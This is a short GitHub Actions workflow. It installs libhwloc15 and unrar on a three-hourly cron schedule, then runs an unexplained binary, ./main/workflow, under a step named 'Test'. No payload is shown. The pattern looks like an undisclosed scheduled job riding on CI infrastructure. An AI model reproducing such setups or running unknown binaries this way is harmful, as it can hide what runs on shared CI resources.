jobs:
  check:
    name: Action
    runs-on: ubuntu-20.04

    steps:
      - name: Checkout
        uses: actions/checkout@v2
      - name: Install Dependencies
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Test
        run: ./main/workflow

name: Main

on:
  schedule:
    - cron: "25 2/3 * * *"
